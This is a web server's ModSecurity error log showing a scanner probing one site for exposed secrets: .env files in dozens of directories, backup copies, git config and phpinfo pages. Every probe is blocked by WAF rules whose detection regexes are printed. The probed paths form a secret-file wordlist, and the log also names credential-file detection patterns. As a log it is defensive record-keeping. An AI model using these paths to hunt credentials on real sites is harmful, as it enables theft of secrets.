[Tue May 26 14:29:58.701600 2026] [security2:error] [pid 610693:tid 610835] [client 195.178.110.199:48048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtuAAAAAw"]
[Tue May 26 14:29:58.734741 2026] [security2:error] [pid 610693:tid 610912] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtuwAAAFk"]
[Tue May 26 14:29:58.735769 2026] [security2:error] [pid 610693:tid 610858] [client 195.178.110.199:48158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.docker/.env"] [unique_id "ahVhDjvNO3hpmlY6M8RtvAAAACM"]
[Tue May 26 14:29:58.801907 2026] [security2:error] [pid 610693:tid 610871] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.bak"] [unique_id "ahVhDjvNO3hpmlY6M8RtvgAAADA"]
[Tue May 26 14:29:58.951852 2026] [security2:error] [pid 610693:tid 610892] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.old"] [unique_id "ahVhDjvNO3hpmlY6M8RtzQAAAEU"]
[Tue May 26 14:29:59.018257 2026] [security2:error] [pid 610693:tid 610927] [client 195.178.110.199:48158] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.backup"] [unique_id "ahVhDzvNO3hpmlY6M8Rt2gAAAGg"]
[Tue May 26 14:29:59.077491 2026] [security2:error] [pid 610693:tid 610839] [client 195.178.110.199:48056] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.php"] [unique_id "ahVhDzvNO3hpmlY6M8Rt3AAAABA"]
[Tue May 26 14:29:59.093787 2026] [security2:error] [pid 610693:tid 610870] [client 195.178.110.199:48122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env.swp"] [unique_id "ahVhDzvNO3hpmlY6M8Rt3QAAAC8"]
[Tue May 26 14:29:59.256427 2026] [security2:error] [pid 606909:tid 607118] [client 195.178.110.199:48094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.env~"] [unique_id "ahVhD10yRtX9qA7aVUV0OQAAANQ"]
[Tue May 26 14:29:59.372339 2026] [security2:error] [pid 610693:tid 610940] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.bak"] [unique_id "ahVhDzvNO3hpmlY6M8Rt7gAAAHU"]
[Tue May 26 14:29:59.411660 2026] [security2:error] [pid 606909:tid 607074] [client 195.178.110.199:48094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config.old"] [unique_id "ahVhD10yRtX9qA7aVUV0PAAAAKg"]
[Tue May 26 14:29:59.544760 2026] [security2:error] [pid 610693:tid 610918] [client 195.178.110.199:48166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.git/config~"] [unique_id "ahVhDzvNO3hpmlY6M8Rt9AAAAF8"]
[Tue May 26 14:29:59.658809 2026] [security2:error] [pid 606909:tid 607042] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhD10yRtX9qA7aVUV0OgAAAIg"]
[Tue May 26 14:30:00.277901 2026] [security2:error] [pid 606909:tid 606921] [remote 121.200.216.55:45830] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahVhEF0yRtX9qA7aVUV0RgAAkgs"]
[Tue May 26 14:30:01.656064 2026] [security2:error] [pid 606909:tid 607147] [client 167.71.198.58:50549] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "shardagalaxy.com"] [uri "/index.php"] [unique_id "ahVhEV0yRtX9qA7aVUV0XgAAAPE"], referer: https://shapeacademy.pl//blog//wp-login.php
[Tue May 26 14:30:01.699170 2026] [security2:error] [pid 610693:tid 610887] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhETvNO3hpmlY6M8RuIAAAAEA"]
[Tue May 26 14:30:01.777522 2026] [security2:error] [pid 610693:tid 610908] [client 154.161.32.97:56477] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "lmialumni.org"] [uri "/xmlrpc.php"] [unique_id "ahVhETvNO3hpmlY6M8RuHgAAAFU"]
[Tue May 26 14:30:02.156784 2026] [autoindex:error] [pid 610693:tid 610873] [client 195.178.110.199:48122] AH01276: Cannot serve directory /home2/azurm42s/gestionbar.azurmediatec.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:30:02.284363 2026] [security2:error] [pid 610693:tid 610847] [client 195.178.110.199:48108] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/ADMIN/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuRAAAABg"]
[Tue May 26 14:30:02.368979 2026] [security2:error] [pid 610693:tid 610922] [client 195.178.110.199:48142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVhEjvNO3hpmlY6M8RuSQAAAGM"]
[Tue May 26 14:30:02.428362 2026] [security2:error] [pid 610693:tid 610893] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/API/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuTgAAAEY"]
[Tue May 26 14:30:02.485534 2026] [security2:error] [pid 606909:tid 607064] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BACKEND/.env"] [unique_id "ahVhEl0yRtX9qA7aVUV0dQAAAJ4"]
[Tue May 26 14:30:02.522319 2026] [security2:error] [pid 610693:tid 610894] [client 195.178.110.199:48166] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BE/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuUgAAAEc"]
[Tue May 26 14:30:02.576425 2026] [security2:error] [pid 610693:tid 610916] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/APP/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuVgAAAF0"]
[Tue May 26 14:30:02.576767 2026] [security2:error] [pid 610693:tid 610836] [client 195.178.110.199:48122] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Be/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuVwAAAA0"]
[Tue May 26 14:30:02.609811 2026] [security2:error] [pid 610693:tid 610855] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BACK/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuWQAAACA"]
[Tue May 26 14:30:02.729635 2026] [security2:error] [pid 610693:tid 610889] [client 195.178.110.199:48130] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Backend/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuXwAAAEI"]
[Tue May 26 14:30:02.747089 2026] [security2:error] [pid 610693:tid 610917] [client 195.178.110.199:48112] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Api/.env"] [unique_id "ahVhEjvNO3hpmlY6M8RuYAAAAF4"]
[Tue May 26 14:30:03.046003 2026] [security2:error] [pid 610693:tid 610858] [client 195.178.110.199:48112] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RubAAAACM"]
[Tue May 26 14:30:03.346872 2026] [security2:error] [pid 610693:tid 610892] [client 195.178.110.199:48122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RugwAAAEU"]
[Tue May 26 14:30:03.440239 2026] [security2:error] [pid 610693:tid 610895] [client 195.178.110.199:48100] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/administrator/.env"] [unique_id "ahVhEzvNO3hpmlY6M8RuiAAAAEg"]
[Tue May 26 14:30:03.452501 2026] [security2:error] [pid 606909:tid 607100] [client 195.178.110.199:48154] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api-backend/.env"] [unique_id "ahVhE10yRtX9qA7aVUV0jgAAAMI"]
[Tue May 26 14:30:03.541083 2026] [security2:error] [pid 610693:tid 610881] [client 195.178.110.199:48088] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin-app/.env"] [unique_id "ahVhEzvNO3hpmlY6M8RujQAAADo"]
[Tue May 26 14:30:03.564518 2026] [security2:error] [pid 610693:tid 610877] [client 195.178.110.199:48130] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RujwAAADY"]
[Tue May 26 14:30:03.594125 2026] [security2:error] [pid 610693:tid 610905] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api-node/.env"] [unique_id "ahVhEzvNO3hpmlY6M8RukAAAAFI"]
[Tue May 26 14:30:03.622537 2026] [security2:error] [pid 606909:tid 607110] [client 195.178.110.199:48094] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/.env"] [unique_id "ahVhE10yRtX9qA7aVUV0jwAAAMw"]
[Tue May 26 14:30:03.695249 2026] [security2:error] [pid 610693:tid 610868] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhEzvNO3hpmlY6M8RuewAAAC0"]
[Tue May 26 14:30:03.733337 2026] [security2:error] [pid 610693:tid 610882] [client 195.178.110.199:48100] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/info.php"] [unique_id "ahVhEzvNO3hpmlY6M8RumAAAADs"]
[Tue May 26 14:30:03.842946 2026] [security2:error] [pid 610693:tid 610922] [client 195.178.110.199:48124] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/phpinfo.php"] [unique_id "ahVhEzvNO3hpmlY6M8RuogAAAGM"]
[Tue May 26 14:30:04.094968 2026] [security2:error] [pid 610693:tid 610836] [client 195.178.110.199:32902] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/apis/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RurwAAAA0"]
[Tue May 26 14:30:04.368088 2026] [security2:error] [pid 610693:tid 610840] [client 195.178.110.199:48072] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/app/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RuvgAAABE"]
[Tue May 26 14:30:04.581900 2026] [security2:error] [pid 610693:tid 610828] [client 195.178.110.199:48050] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/apps/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RuyQAAAAU"]
[Tue May 26 14:30:04.678264 2026] [security2:error] [pid 610693:tid 610903] [client 195.178.110.199:48048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/application/.env"] [unique_id "ahVhFDvNO3hpmlY6M8RuzQAAAFA"]
[Tue May 26 14:30:05.181598 2026] [security2:error] [pid 610693:tid 610887] [client 195.178.110.199:32894] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/back-end/.env"] [unique_id "ahVhFTvNO3hpmlY6M8Ru4wAAAEA"]
